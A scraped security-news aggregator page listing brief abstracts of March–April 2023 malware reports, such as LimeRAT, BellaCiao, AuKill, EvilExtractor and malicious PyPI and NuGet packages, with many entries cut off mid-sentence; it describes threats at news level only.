Remote Access Trojans (RATs) have taken the third leading position in ANY. RUN's Q1 2023 report on the most prevalent malware types, making it highly probable that your organization may face this threat. Though LimeRAT might not be the most well-known RAT family, its versatility is what sets it apart. Capable of carrying out a broad spectrum of malicious activities, it excels not only in data exfiltration, but also in creating DDoS botnets and facilitating crypto mining. Its compact footprint allows it to elude endpoint detection systems, making it a stealthy adversary. Interestingly, LimeRAT shares similarities with njRAT, which ANY.RUN ranks as the third most popular malware family in terms of uploads during Q1 2023. ANY.RUN researchers have recently conducted an in-depth analysis of a LimeRAT sample and successfully extracted its configuration. In this article, we'll provide a brief overview of that analysis. Collected artifacts SHA1 14836dd608efb4a0c552a4f370eThe Hacker News
April 26, 2023
Google Ads Abused to Distribute New LOBSHOT Malware Full Text
Abstract
Elastic Security Labs has uncovered LOBSHOT, a previously unknown hVNC malware, that impersonates legitimate software for financial gain and is promoted through malvertising, such as Google Ads, to extend their reach and perpetrate their attacks. It targets 32 Chrome extensions, nine Edge wallet ex ... Read MoreCyware
April 26, 2023
Charming Kitten’s New BellaCiao Malware Discovered in Multi-Country Attacks Full Text
Abstract
The prolific Iranian nation-state group known as Charming Kitten is actively targeting multiple victims in the U.S., Europe, the Middle East and India with a novel malware dubbed BellaCiao , adding to its ever-expanding list of custom tools. Discovered by Bitdefender Labs, BellaCiao is a "personalized dropper" that's capable of delivering other malware payloads onto a victim machine based on commands received from an actor-controlled server. "Each sample collected was tied up to a specific victim and included hard-coded information such as company name, specially crafted subdomains, or associated public IP address," the Romanian cybersecurity firm said in a report shared with The Hacker News. Charming Kitten, also known as APT35, Cobalt Illusion, Educated Manticore, ITG18, Mint Sandstorm (née Phosphorus), TA453, and Yellow Garuda, is an Iranian state-sponsored APT group associated with the Islamic Revolutionary Guard Corps ( IRGC ). Over the years, theThe Hacker News
April 24, 2023
AuKill tool uses BYOVD attack to disable EDR software Full Text
Abstract
Ransomware operators use the AuKill tool to disable EDR software through Bring Your Own Vulnerable Driver (BYOVD) attack. Sophos researchers reported that threat actors are using a previously undocumented defense evasion tool, dubbed AuKill, to...Security Affairs
April 24, 2023
EvilExtractor, a new All-in-One info stealer appeared on the Dark Web Full Text
Abstract
EvilExtractor is a new "all-in-one" info stealer for Windows that is being advertised for sale on dark web cybercrime forums. Fortinet FortiGuard Labs researchers discovered a new "all-in-one" info stealer for Windows, dubbed EvilExtractor (sometimes...Security Affairs
April 24, 2023
AuKill Exploits Process Explorer Utility via BYOVD, Deploys Ransomware Full Text
Abstract
Sophos X-Ops uncovered a defense evasion tool called AuKill. The tool exploits an outdated version of the driver used by version 16.32 of the Microsoft utility Process Explorer to disable EDR processes to deploy either a backdoor or ransomware on the targeted system. Since the beginning of 2023, th ... Read MoreCyware
April 24, 2023
New All-in-One “EvilExtractor” Stealer for Windows Systems Surfaces on the Dark Web Full Text
Abstract
A new "all-in-one" stealer malware named EvilExtractor (also spelled Evil Extractor) is being marketed for sale for other threat actors to steal data and files from Windows systems. "It includes several modules that all work via an FTP service," Fortinet FortiGuard Labs researcher Cara Lin said . "It also contains environment checking and Anti-VM functions. Its primary purpose seems to be to steal browser data and information from compromised endpoints and then upload it to the attacker's FTP server." The network security company said it observed a surge in attacks spreading the malware in the wild in March 2023, with a majority of the victims located in Europe and the U.S. While marketed as an educational tool, EvilExtractor has been adopted by threat actors for use as an information stealer. The attack tool is being sold by an actor named Kodex on cybercrime forums like Cracked dating back to October 22, 2022. It's continually updated andThe Hacker News
April 24, 2023
Package names repurposed to push malware on PyPI Full Text
Abstract
At the beginning of March, ReversingLabs researchers encountered a malicious package on the Python Package Index (PyPI) named termcolour, a three-stage downloader published in multiple versions.Cyware
April 22, 2023
Infoblox Uncovers DNS Malware Toolkit & Urges Companies to Block Malicious Domains Full Text
Abstract
Infoblox discovered activity from the remote access trojan (RAT) Pupy active in multiple enterprise networks in early April 2023. This C2 communication went undiscovered since April 2022.Cyware
April 22, 2023
Abandoned Eval PHP WordPress plugin abused to backdoor websites Full Text
Abstract
Threat actors were observed installing the abandoned Eval PHP plugin on compromised WordPress sites for backdoor deployment. Researchers from Sucuri warned that threat actors are installing the abandoned Eval PHP plugin on compromised WordPress sites...Security Affairs
April 20, 2023
‘AuKill’ EDR killer malware abuses Process Explorer driver Full Text
Abstract
The AuKill tool abuses an outdated version of the driver used by version 16.32 of the Microsoft utility, Process Explorer, to disable EDR processes before deploying either a backdoor or ransomware on the target system.Cyware
April 20, 2023
Giving a Face to the Malware Proxy Service ‘Faceless’ – Krebs on Security Full Text
Abstract
For less than a dollar per day, Faceless customers can route their malicious web traffic through tens of thousands of compromised systems advertised on the proxy service.Cyware
April 19, 2023
Goldoson Library Infects Popular Apps with Adware Full Text
Abstract
A recently detected Android malware named 'Goldoson' has made its way into Google Play and has been found in 60 legitimate applications, which have been downloaded a total of 100 million times. Users are suggested to always perform due diligence, especially for new apps without good reviews.Cyware
April 18, 2023
YouTube Videos Distributing Aurora Stealer Malware via Highly Evasive Loader Full Text
Abstract
Cybersecurity researchers have detailed the inner workings of a highly evasive loader named " in2al5d p3in4er " (read: invalid printer) that's used to deliver the Aurora information stealer malware. "The in2al5d p3in4er loader is compiled with Embarcadero RAD Studio and targets endpoint workstations using advanced anti-VM (virtual machine) technique," cybersecurity firm Morphisec said in a report shared with The Hacker News. Aurora is a Go-based information stealer that emerged on the threat landscape in late 2022. Offered as a commodity malware to other actors, it's distributed through YouTube videos and SEO-poised fake cracked software download websites. Clicking the links present in YouTube video descriptions redirects the victim to decoy websites where they are enticed into downloading the malware under the garb of a seemingly-legitimate utility. The loader analyzed by Morphisec is designed to query the vendor ID of the graphics card installThe Hacker News
April 18, 2023
Goldoson Android Malware Infects Over 100 Million Google Play Store Downloads Full Text
Abstract
A new Android malware strain named Goldoson has been detected in the official Google Play Store spanning more than 60 legitimate apps that collectively have over 100 million downloads. An additional eight million installations have been tracked through ONE store, a leading third-party app storefront in South Korea. The rogue component is part of a third-party software library used by the apps in question and is capable of gathering information about installed apps, Wi-Fi and Bluetooth-connected devices, and GPS locations. "Moreover, the library is armed with the functionality to perform ad fraud by clicking advertisements in the background without the user's consent," McAfee security researcher SangRyol Ryu said in a report published last week. What's more, it includes the ability to stealthily load web pages, a feature that could be abused to load ads for financial profit. It achieves this by loading HTML code in a hidden WebView and driving traffic to thThe Hacker News
April 18, 2023
in2al5d p3in4er is Almost Completely Undetectable Full Text
Abstract
The component that makes Aurora’s delivery stealthy and dangerous is a highly evasive loader we named “in2al5d p3in4er.” It is compiled with Embarcadero RAD Studio and targets endpoint workstations using an advanced anti-VM technique.Cyware
April 17, 2023
Understanding the Threat of Titan Stealer Malware Full Text
Abstract
The malware spreads through methods like phishing, malicious ads, and cracked software. It also uses a technique called process hollowing to inject the malicious code into a legitimate process called AppLaunch.exe.Cyware
April 17, 2023
Israeli Spyware Vendor QuaDream to Shut Down Following Citizen Lab and Microsoft Expose Full Text
Abstract
Israeli spyware vendor QuaDream is allegedly shutting down its operations in the coming days, less than a week after its hacking toolset was exposed by Citizen Lab and Microsoft. The development was reported by the Israeli business newspaper Calcalist , citing unnamed sources, adding the company "hasn't been fully active for a while" and that it "has been in a difficult situation for several months." The company's board of directors are looking to sell off its intellectual property, the report further added. News of the purported shutdown comes as the firm's spyware framework – dubbed REIGN – was outed as having been used against journalists, political opposition figures, and NGO workers across North America, Central Asia, Southeast Asia, Europe, and the Middle East. Microsoft described REIGN as a "suite of exploits, malware, and infrastructure designed to exfiltrate data from mobile devices." The attacks entailed the exploitation ofThe Hacker News
April 17, 2023
New QBot Banking Trojan Campaign Hijacks Business Emails to Spread Malware Full Text
Abstract
A new QBot malware campaign is leveraging hijacked business correspondence to trick unsuspecting victims into installing the malware, new findings from Kaspersky reveal. The latest activity, which commenced on April 4, 2023, has primarily targeted users in Germany, Argentina, Italy, Algeria, Spain, the U.S., Russia, France, the U.K., and Morocco. QBot (aka Qakbot or Pinkslipbot) is a banking trojan that's known to be active since at least 2007. Besides stealing passwords and cookies from web browsers, it doubles up as a backdoor to inject next-stage payloads such as Cobalt Strike or ransomware. Distributed via phishing campaigns, the malware has seen constant updates during its lifetime that pack in anti-VM, anti-debugging, and anti-sandbox techniques to evade detection. It has also emerged as the most prevalent malware for the month of March 2023, per Check Point. "Early on, it was distributed through infected websites and pirated software," Kaspersky reThe Hacker News
April 17, 2023
Experts warn of an emerging Python-based credential harvester named Legion Full Text
Abstract
Legion is an emerging Python-based credential harvester and hacking tool that allows operators to break into various online services. Cado Labs researchers recently discovered a new Python-based credential harvester and hacking tool, named Legion,...Security Affairs
April 17, 2023
New Zaraza Bot Credential-Stealer Sold on Telegram Targeting 38 Web Browsers Full Text
Abstract
A novel credential-stealing malware called Zaraza bot is being offered for sale on Telegram while also using the popular messaging service as a command-and-control (C2). "Zaraza bot targets a large number of web browsers and is being actively distributed on a Russian Telegram hacker channel popular with threat actors," cybersecurity company Uptycs said in a report published last week. "Once the malware infects a victim's computer, it retrieves sensitive data and sends it to a Telegram server where the attackers can access it immediately." A 64-bit binary file compiled using C#, Zaraza bot is designed to target as many as 38 different web browsers, including Google Chrome, Microsoft Edge, Opera, AVG Browser, Brave, Vivaldi, and Yandex. It's also equipped to capture screenshots of the active window. It's the latest example of malware that's capable of capturing login credentials associated with online bank accounts, cryptocurrency walletsThe Hacker News
April 15, 2023
Legion: A Python-Based Hacking Tool Targets Websites and Web Services Full Text
Abstract
The cybercriminal group, which goes by the moniker “Forza Tools,” was seen offering Legion - a Python-based credential harvester and SMTP hijacking tool. The malware targets online email services for phishing and spam attacks. Experts suggest it is likely based on the AndroxGhOst malware and has se ... Read MoreCyware
April 15, 2023
New Android malicious library Goldoson found in 60 apps +100M downloads Full Text
Abstract
A new Android malware named Goldoson was distributed through 60 legitimate apps on the official Google Play store. The Goldoson library was discovered by researchers from McAfee’s Mobile Research Team, it collects lists of applications installed...Security Affairs
April 14, 2023
Privacy-invasive and Clicker Android Adware found in popular apps in South Korea Full Text
Abstract
Some apps were removed from Google Play while others were updated by the official developers. Users are encouraged to update the apps to the latest version to remove the identified threat from their devices.Cyware
April 13, 2023
Qbot Takes New Distribution Method to Infect Korean Users Full Text
Abstract
AhnLab has discovered a fresh attack strategy that spreads Qbot malware through malevolent PDF attachments added to replies or forwarded messages in already-existing emails. Qbot or Qakbot follows a destructive attack pattern, shifting from one tactic to another for maximum profits.Cyware
April 13, 2023
Malicious ChatGPT & Google Bard Installers Distribute RedLine Stealer Full Text
Abstract
When a victim installs a malicious file from one of these sponsored ads, their device is hijacked by the RedLine infostealer, which can then steal confidential data, disrupt critical infrastructure, and compromise financial accounts.Cyware
April 13, 2023
New Python-Based “Legion” Hacking Tool Emerges on Telegram Full Text
Abstract
An emerging Python-based credential harvester and a hacking tool named Legion is being marketed via Telegram as a way for threat actors to break into various online services for further exploitation. Legion, according to Cado Labs , includes modules to enumerate vulnerable SMTP servers, conduct remote code execution (RCE) attacks, exploit unpatched versions of Apache, and brute-force cPanel and WebHost Manager (WHM) accounts. The malware is said to bear similarities to another malware family called AndroxGh0st that was first documented by cloud security services provider Lacework in December 2022. Cybersecurity firm SentinelOne, in an analysis published late last month, revealed that AndroxGh0st is part of a comprehensive toolset called AlienFox that's offered to threat actors to steal API keys and secrets from cloud services. "Legion appears to be part of an emerging generation of cloud-focused credential harvester/spam utilities," security researcher Matt MuirThe Hacker News
April 12, 2023
Israel-based Spyware Firm QuaDream Targets High-Risk iPhones with Zero-Click Exploit Full Text
Abstract
Threat actors using hacking tools from an Israeli surveillanceware vendor named QuaDream targeted at least five members of civil society in North America, Central Asia, Southeast Asia, Europe, and the Middle East. According to findings from a group of researchers from the Citizen Lab, the spyware campaign was directed against journalists, political opposition figures, and an NGO worker in 2021. The names of the victims were not disclosed. It's also suspected that the company abused a zero-click exploit dubbed ENDOFDAYS in iOS 14 to deploy spyware as a zero-day in version 14.4 and 14.4.2. There is no evidence that the exploit has been used after March 2021. ENDOFDAYS "appears to make use of invisible iCloud calendar invitations sent from the spyware's operator to victims," the researchers said , adding the .ics files contain invites to two backdated and overlapping events so as to not alert the users. The attacks are suspected to have leveraged a quirk in iOS 1The Hacker News
April 11, 2023
Malware Disguised as Document from Ukraine’s Energoatom Delivers Havoc Demon Backdoor Full Text
Abstract
When opened, it displays an image instructing the user to enable Word’s macro code execution to reveal information supposedly protected by M.E. Doc (My Electronic Document).Cyware
April 11, 2023
Cryptocurrency Stealer Malware Distributed via 13 NuGet Packages Full Text
Abstract
Cybersecurity researchers have detailed the inner workings of the cryptocurrency stealer malware that was distributed via 13 malicious NuGet packages as part of a supply chain attack targeting .NET developers. The sophisticated typosquatting campaign, which was detailed by JFrog late last month, impersonated legitimate packages to execute PowerShell code designed to retrieve a follow-on binary from a hard-coded server. The two-stage attack culminates in the deployment of a .NET-based persistent backdoor, called Impala Stealer, which is capable of gaining unauthorized access to users' cryptocurrency accounts. "The payload used a very rare obfuscation technique, called '.NET AoT compilation,' which is a lot more stealthy than using 'off the shelf' obfuscators while still making the binary hard to reverse engineer," JFrog told The Hacker News in a statement. .NET AoT compilation is an optimization technique that allows apps to be ahead-of-time cThe Hacker News
April 9, 2023
Hackers Hide Backdoors Behind Malicious Self-Extracting Archives Full Text
Abstract
Malicious actors are incorporating harmful features into self-extracting archives created with WinRAR, which contain benign decoy files. This tactic enables them to implant backdoors on the targeted system without arousing any suspicion. An apparently empty SFX archive file can be missed by technol ... Read MoreCyware
April 9, 2023
CryptoClippy: New Clipper Malware That Targets Portuguese Users Full Text
Abstract
Cybercriminals launched a malvertising campaign involving malware named CryptoClippy to pilfer cryptocurrency from users in Portugal. Discovered by Palo Alto Networks Unit 42, the campaign uses SEO poisoning techniques to push users looking for "WhatsApp web" to fake domains containing malicious so ... Read MoreCyware
April 9, 2023
FusionCore - An Emerging Malware-as-a-Service Group in Europe Full Text
Abstract
Active since November, FusionCore acts as a one-stop-shop for cybercriminals; it offers services such as malware-as-a-subscription, hacking for hire, and ransomware. It has rolled out a ransomware affiliate program as well called AnthraXXXLocker. Typhon Reborn is one example of the group's propriet ... Read MoreCyware
April 7, 2023
Typhon Reborn V2 Enhances Evasion Capabilities Full Text
Abstract
Crypto miner/stealer for hire, Typhon Stealer, received a new update, disclosed Palo Alto Networks. The new variant boasts enhanced anti-analysis techniques, as well as other stealing and file-grabber features. The malware leverages Telegram’s API and infrastructure to exfiltrate all stolen data.Cyware
April 6, 2023
BatLoader Malware Dropper Continues to Pose a Threat to Organizations in 2023 Full Text
Abstract
BatLoader can modify Windows UAC prompt, disable Windows Defender notifications, disable Task Manager, prevent users from accessing Windows registry tools, disable the Run command, and modify the display timeout.Cyware
April 05, 2023
CryptoClippy: New Clipper Malware Targeting Portuguese Cryptocurrency Users Full Text
Abstract
Portuguese users are being targeted by a new malware codenamed CryptoClippy that's capable of stealing cryptocurrency as part of a malvertising campaign. The activity leverages SEO poisoning techniques to entice users searching for "WhatsApp web" to rogue domains hosting the malware, Palo Alto Networks Unit 42 said in a new report published today. CryptoClippy, a C-based executable, is a type of cryware known as clipper malware that monitors a victim's clipboard for content matching cryptocurrency addresses and substituting them with a wallet address under the threat actor's control. "The clipper malware uses regular expressions (regexes) to identify what type of cryptocurrency the address pertains to," Unit 42 researchers said. "It then replaces the clipboard entry with a visually similar but adversary-controlled wallet address for the appropriate cryptocurrency. Later, when the victim pastes the address from the clipboard to conduThe Hacker News
April 05, 2023
Typhon Reborn Stealer Malware Resurfaces with Advanced Evasion Techniques Full Text
Abstract
The threat actor behind the information-stealing malware known as Typhon Reborn has resurfaced with an updated version (V2) that packs in improved capabilities to evade detection and resist analysis. The new version is offered for sale on the criminal underground for $59 per month, $360 per year, or alternatively, for $540 for a lifetime subscription. "The stealer can harvest and exfiltrate sensitive information and uses the Telegram API to send stolen data to attackers," Cisco Talos researcher Edmund Brumaghin said in a Tuesday report. Typhon was first documented by Cyble in August 2022, detailing its myriad features, including hijacking clipboard content, capturing screenshots, logging keystrokes, and stealing data from crypto wallet, messaging, FTP, VPN, browser, and gaming apps. Based on another stealer malware called Prynt Stealer , Typhon is also capable of delivering the XMRig cryptocurrency miner. In November 2022, Palo Alto Networks Unit 42 unearthed anThe Hacker News
April 04, 2023
New Rilide Malware Targeting Chromium-Based Browsers to Steal Cryptocurrency Full Text
Abstract
Chromium-based web browsers are the target of a new malware called Rilide that masquerades itself as a seemingly legitimate extension to harvest sensitive data and siphon cryptocurrency. "Rilide malware is disguised as a legitimate Google Drive extension and enables threat actors to carry out a broad spectrum of malicious activities, including monitoring browsing history, taking screenshots, and injecting malicious scripts to withdraw funds from various cryptocurrency exchanges," Trustwave SpiderLabs Research said in a report shared with The Hacker News. What's more, the stealer malware can display forged dialogs to deceive users into entering a two-factor authentication code to withdraw digital assets. Trustwave said it identified two different campaigns involving Ekipa RAT and Aurora Stealer that led to the installation of the malicious browser extension. While Ekipa RAT is distributed via booby-trapped Microsoft Publisher files, rogue Google Ads act as tThe Hacker News
April 4, 2023
Rilide Stealer Delivered via Malicious Browser Extension to Siphon Cryptocurrency Full Text
Abstract
Trustwave SpiderLabs uncovered a new strain of malware that it dubbed Rilide, which targets Chromium-based browsers such as Google Chrome, Microsoft Edge, Brave, and Opera.Cyware
April 03, 2023
Crypto-Stealing OpcJacker Malware Targets Users with Fake VPN Service Full Text
Abstract
A piece of new information-stealing malware called OpcJacker has been spotted in the wild since the second half of 2022 as part of a malvertising campaign. "OpcJacker's main functions include keylogging, taking screenshots, stealing sensitive data from browsers, loading additional modules, and replacing cryptocurrency addresses in the clipboard for hijacking purposes," Trend Micro researchers Jaromir Horejsi and Joseph C. Chen said . The initial vector of the campaign involves a network of fake websites advertising seemingly innocuous software and cryptocurrency-related applications. The February 2023 campaign specifically singled out users in Iran under the pretext of offering a VPN service. The installer files act as a conduit to deploy OpcJacker, which is also capable of delivering next-stage payloads such as NetSupport RAT and a hidden virtual network computing ( hVNC ) variant for remote access. OpcJacker is concealed using a crypter known as Babadeda anThe Hacker News
March 30, 2023
DBatLoader Sweeps European Countries With Multiple Malware Payloads Full Text
Abstract
A new phishing campaign has surfaced to drop Remcos RAT and Formbook malware through DBatLoader malware loader, revealed Zscaler researchers. The campaign is aimed at compromising systems in Europe. Actors also leverage a multi-layered obfuscated HTML file and OneNote attachments to propagate the D ... Read MoreCyware
March 30, 2023
New AlienFox toolkit harvests credentials for tens of cloud services Full Text
Abstract
AlienFox is a novel comprehensive toolset for harvesting credentials for multiple cloud service providers, SentinelLabs reported. AlienFox is a new modular toolkit that allows threat actors to harvest credentials for multiple cloud service providers. AlienFox...Security Affairs
March 30, 2023
New Mélofée Linux malware linked to Chinese APT groups Full Text
Abstract
Exatrack researchers warn of an unknown China-linked hacking group that has been linked to a new Linux malware, dubbed Mélofée. Cybersecurity researchers from ExaTrack recently discovered a previously undetected malware family, dubbed Mélofée,...Security Affairs
March 30, 2023
AlienFox Malware Targets API Keys and Secrets from AWS, Google, and Microsoft Cloud Services Full Text
Abstract
A new "comprehensive toolset" called AlienFox is being distributed on Telegram as a way for threat actors to harvest credentials from API keys and secrets from popular cloud service providers. "The spread of AlienFox represents an unreported trend towards attacking more minimal cloud services, unsuitable for crypto mining, in order to enable and expand subsequent campaigns," SentinelOne security researcher Alex Delamotte said in a report shared with The Hacker News. The cybersecurity company characterized the malware as highly modular and constantly evolving to accommodate new features and performance improvements. The primary use of AlienFox is to enumerate misconfigured hosts via scanning platforms like LeakIX and SecurityTrails , and subsequently leverage various scripts in the toolkit to extract credentials from configuration files exposed on the servers. Specifically, it entails searching for susceptible servers associated with popular web frameworThe Hacker News
March 30, 2023
NullMixer Campaign Delivers New Polymorphic Loaders Full Text
Abstract
Researchers spotted a new malware operation, named NullMixer, that hit over 8,000 targets within a week, with a special focus on North America, Italy, and France. The attackers use SEO poisoning, along with social engineering tactics to lure their potential victims, consisting mostly of IT personne ... Read MoreCyware
March 29, 2023
Mélofée: Researchers Uncover New Linux Malware Linked to Chinese APT Groups Full Text
Abstract
An unknown Chinese state-sponsored hacking group has been linked to a novel piece of malware aimed at Linux servers. French cybersecurity firm ExaTrack, which found three samples of the previously documented malicious software that date back to early 2022, dubbed it Mélofée . One of the artifacts is designed to drop a kernel-mode rootkit that's based on an open source project referred to as Reptile . "According to the vermagic metadata, it is compiled for a kernel version 5.10.112-108.499.amzn2.x86_64," the company said in a report. "The rootkit has a limited set of features, mainly installing a hook designed for hiding itself." Both the implant and the rootkit are said to be deployed using shell commands that download an installer and a custom binary package from a remote server. The installer takes the binary package as an argument and then extracts the rootkit as well as a server implant module that's currently under active development. MéloféThe Hacker News
March 29, 2023
Spyware Vendors Use 0-days and n-days Against Popular Platforms Full Text
Abstract
In this blog, researchers have shared details about two distinct campaigns that used various 0-day exploits against Android, iOS, and Chrome and were both limited and highly targeted.Cyware
March 28, 2023
Trojanized Tor browsers target Russians with crypto-stealing malware Full Text
Abstract
A surge of trojanized Tor Browser installers targets Russians and Eastern Europeans with clipboard-hijacking malware that steals infected users' cryptocurrency transactions.BleepingComputer
March 28, 2023
IcedID Malware Shifts Focus from Banking Fraud to Ransomware Delivery Full Text
Abstract
Multiple threat actors have been observed using two new variants of the IcedID malware in the wild with more limited functionality that removes functionality related to online banking fraud. IcedID, also known as BokBot, started off as a banking trojan in 2017. It's also capable of delivering additional malware, including ransomware. "The well-known IcedID version consists of an initial loader which contacts a Loader [command-and-control] server, downloads the standard DLL Loader, which then delivers the standard IcedID Bot," Proofpoint said in a new report published Monday. One of the new versions is a Lite variant that was previously highlighted as being dropped as a follow-on payload by the Emotet malware in November 2022. Also newly observed in February 2023 is a Forked variant of IcedID. Both these variants are designed to drop what's called a Forked version of IcedID Bot that leaves out the web injects and backconnect functionality that would typicThe Hacker News
March 28, 2023
Stealthy DBatLoader Malware Loader Spreading Remcos RAT and Formbook in Europe Full Text
Abstract
A new phishing campaign has set its sights on European entities to distribute Remcos RAT and Formbook via a malware loader dubbed DBatLoader . "The malware payload is distributed through WordPress websites that have authorized SSL certificates, which is a common tactic used by threat actors to evade detection engines," Zscaler researchers Meghraj Nandanwar and Satyam Singh said in a report published Monday. The findings build upon a previous report from SentinelOne last month that detailed phishing emails containing malicious attachments that masquerade as financial documents to activate the infection chain. Some of the file formats used to distribute the DBatLoader payload concern the use of a multi-layered obfuscated HTML file and OneNote attachments. The development adds to growing abuse of OneNote files as an initial vector for malware distribution since late last year in response to Microsoft's decision to block macros by default in files downloaded fThe Hacker News
March 28, 2023
DBatLoader Actively Distributing Malware Targeting European Businesses Full Text
Abstract
The campaign targets manufacturing companies and multiple businesses in European countries through phishing emails. The malicious payload is distributed through WordPress sites with authorized SSL certificates.Cyware
March 27, 2023
New MacStealer macOS malware appears in the cybercrime underground Full Text
Abstract
A new MacStealer macOS malware allows operators to steal iCloud Keychain data and passwords from infected systems. Uptycs researchers team discovered a new macOS information stealer, called MacStealer, which allows operators to steal iCloud Keychain...Security Affairs
March 27, 2023
New MacStealer macOS Malware Steals iCloud Keychain Data and Passwords Full Text
Abstract
A new information-stealing malware has set its sights on Apple's macOS operating system to siphon sensitive information from compromised devices. Dubbed MacStealer , it's the latest example of a threat that uses Telegram as a command-and-control (C2) platform to exfiltrate data. It primarily affects devices running macOS versions Catalina and later running on M1 and M2 CPUs. "MacStealer has the ability to steal documents, cookies from the victim's browser, and login information," Uptycs researchers Shilpesh Trivedi and Pratik Jeware said in a new report. First advertised on online hacking forums at the start of the month, it is still a work in progress, with the malware authors planning to add features to capture data from Apple's Safari browser and the Notes app. In its current form, MacStealer is designed to extract iCloud Keychain data, passwords and credit card information from browsers like Google Chrome, Mozilla Firefox, and Brave. It also featurThe Hacker News
March 27, 2023
Updates from the MaaS: new threats delivered through NullMixer Full Text
Abstract
A technical analysis of NullMixer malware operation revealed Italy and France are the favorite European countries from the attackers’ perspective. Executive Summary Our insights into a recent NullMixer malware operation revealed Italy and France...Security Affairs
March 27, 2023
Malicious Python Package uses Unicode support to evade detection Full Text
Abstract
Researchers discovered a malicious package on PyPI that uses Unicode to evade detection while stealing sensitive data. Supply chain security firm Phylum discovered a malicious Python package on the Python Package Index (PyPI) repository that uses...Security Affairs
March 24, 2023
Malicious Python Package Uses Unicode Trickery to Evade Detection and Steal Data Full Text
Abstract
A malicious Python package on the Python Package Index (PyPI) repository has been found to use Unicode as a trick to evade detection and deploy an info-stealing malware. The package in question, named onyxproxy , was uploaded to PyPI on March 15, 2023, and comes with capabilities to harvest and exfiltrate credentials and other valuable data. It has since been taken down, but not before attracting a total of 183 downloads . According to software supply chain security firm Phylum, the package incorporates its malicious behavior in a setup script that's packed with thousands of seemingly legitimate code strings. These strings include a mix of bold and italic fonts and are still readable and can be parsed by the Python interpreter, only to activate the execution of the stealer malware upon installation of the package. "An obvious and immediate benefit of this strange scheme is readability," the company noted . "Moreover, these visible differences do not preventThe Hacker News
March 23, 2023
Fake ChatGPT Chrome Browser Extension Caught Hijacking Facebook Accounts Full Text
Abstract
Google has stepped in to remove a bogus Chrome browser extension from the official Web Store that masqueraded as OpenAI's ChatGPT service to harvest Facebook session cookies and hijack the accounts. The "ChatGPT For Google" extension, a trojanized version of a legitimate open source browser add-on , attracted over 9,000 installations since March 14, 2023, prior to its removal. It was originally uploaded to the Chrome Web Store on February 14, 2023. According to Guardio Labs researcher Nati Tal, the extension is propagated through malicious sponsored Google search results that are designed to redirect unsuspecting users searching for "Chat GPT-4" to fraudulent landing pages that point to the fake add-on. Installing the extension adds the promised functionality – i.e., enhancing search engines with ChatGPT – but it also stealthily activates the ability to capture Facebook-related cookies and exfiltrate it to a remote server in an encrypted manner. OncThe Hacker News
March 23, 2023
Nexus: A New Rising Android Banking Trojan Targeting 450 Financial Apps Full Text
Abstract
An emerging Android banking trojan dubbed Nexus has already been adopted by several threat actors to target 450 financial applications and conduct fraud. "Nexus appears to be in its early stages of development," Italian cybersecurity firm Cleafy said in a report published this week. "Nexus provides all the main features to perform ATO attacks (Account Takeover) against banking portals and cryptocurrency services, such as credentials stealing and SMS interception." The trojan, which appeared in various hacking forums at the start of the year, is advertised as a subscription service to its clientele for a monthly fee of $3,000. Details of the malware were first documented by Cyble earlier this month. However, there are indications that the malware may have been used in real-world attacks as early as June 2022, at least six months before its official announcement on darknet portals. According to security researcher Rohit Bansal ( @0xrb ) and confirmed by tThe Hacker News
March 23, 2023
Experts published PoC exploit code for Veeam Backup & Replication bug Full Text
Abstract
Researchers released a PoC exploit code for a high-severity vulnerability in Veeam Backup & Replication (VBR) software. Veeam recently addressed a high-severity flaw, tracked as CVE-2023-27532, in Veeam Backup and Replication (VBR) software....Security Affairs
March 23, 2023
Nexus, an emerging Android banking Trojan targets 450 financial apps Full Text
Abstract
Experts warn of an emerging Android banking trojan dubbed Nexus that was employed in attacks against 450 financial applications. Cybersecurity firm experts from Cleafy warn of an emerging Android banking trojan, named Nexus, that was employed...Security Affairs
March 22, 2023
Emotet Adopts the Trend for OneNote Infection Full Text
Abstract
Security researcher abel took the wraps off Emotet’s new distribution technique that allows it to propagate through Microsoft OneNote email attachments. The operators have a history of deploying malicious macros on infected systems via Microsoft Word and Excel attachments. This new method of infect ... Read MoreCyware
March 22, 2023
ScarCruft’s Evolving Arsenal: Researchers Reveal New Malware Distribution Techniques Full Text
Abstract
The North Korean advanced persistent threat (APT) actor dubbed ScarCruft is using weaponized Microsoft Compiled HTML Help (CHM) files to download additional malware. According to multiple reports from AhnLab Security Emergency response Center ( ASEC ), SEKOIA.IO , and Zscaler , the development is illustrative of the group's continuous efforts to refine and retool its tactics to sidestep detection. "The group is constantly evolving its tools, techniques, and procedures while experimenting with new file formats and methods to bypass security vendors," Zscaler researchers Sudeep Singh and Naveen Selvan said in a new analysis published Tuesday. ScarCruft, also tracked under the names APT37, Reaper, RedEyes, and Ricochet Chollima, has exhibited an increased operational tempo since the start of the year, targeting various South Korean entities for espionage purposes. It is known to be active since at least 2012. Last month, ASEC disclosed a campaign that employedThe Hacker News
March 22, 2023
Rogue ChatGPT extension FakeGPT hijacked Facebook accounts Full Text
Abstract
A tainted version of the legitimate ChatGPT extension for Chrome, designed to steal Facebook accounts, has thousands of downloads. Guardio’s security team uncovered a new variant of a malicious Chat-GPT Chrome Extension that was already downloaded...Security Affairs
March 22, 2023
Experts released PoC exploits for severe flaws in Netgear Orbi routers Full Text
Abstract
Cisco Talos researchers published PoC exploits for vulnerabilities in Netgear Orbi 750 series router and extender satellites. Netgear Orbi is a line of mesh Wi-Fi systems designed to provide high-speed, reliable Wi-Fi coverage throughout a home or business....Security Affairs
March 22, 2023
Rogue NuGet Packages Infect .NET Developers with Crypto-Stealing Malware Full Text
Abstract
The NuGet repository is the target of a new "sophisticated and highly-malicious attack" aiming to infect .NET developer systems with cryptocurrency stealer malware. The 13 rogue packages, which were downloaded more than 160,000 times over the past month, have since been taken down. "The packages contained a PowerShell script that would execute upon installation and trigger a download of a 'second stage' payload, which could be remotely executed," JFrog researchers Natan Nehorai and Brian Moussalli said . While NuGet packages have been in the past found to contain vulnerabilities and be abused to propagate phishing links , the development marks the first-ever discovery of packages with malicious code. Three of the most downloaded packages – Coinbase.Core, Anarchy.Wrapper.Net, and DiscordRichPresence.API – alone accounted for 166,000 downloads, although it's also possible that the threat actors artificially inflated the download counts using boThe Hacker News
March 22, 2023
NAPLISTENER: New Malware in REF2924 Group’s Arsenal for Bypassing Detection Full Text
Abstract
